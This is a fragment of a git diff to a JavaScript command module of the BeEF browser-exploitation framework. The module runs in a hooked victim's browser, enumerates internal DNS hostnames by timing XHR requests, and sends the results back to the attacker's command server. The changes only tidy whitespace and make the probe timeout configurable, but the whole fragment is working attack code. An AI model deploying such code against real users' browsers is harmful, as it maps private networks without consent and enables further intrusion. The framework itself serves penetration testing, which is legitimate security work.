         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);
         check_next();
     }
-    
-    function check_next() { 
+
+    function check_next() {
         cont++;
-        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port); 
-        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); 
+        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port);
+        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000);
     }
 
     function do_resolv(url) {
@@ -42,15 +42,15 @@ beef.execute(function() {
         } else {
             return -1;
         }
-        
+
         xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };
         xhr.send();
-        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000);
+        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);
     }
 
     beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');
     if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); 
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported');
     }
 
 });